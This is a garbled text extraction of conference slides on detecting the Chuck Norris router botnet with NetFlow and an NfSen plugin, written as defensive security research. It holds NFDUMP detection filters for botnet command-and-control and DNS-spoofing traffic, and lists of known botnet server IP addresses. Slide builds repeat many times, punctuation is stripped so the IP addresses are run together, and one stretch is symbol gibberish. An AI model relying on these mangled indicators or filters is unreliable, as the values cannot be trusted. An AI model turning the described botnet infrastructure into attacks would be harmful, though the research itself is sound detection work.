Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
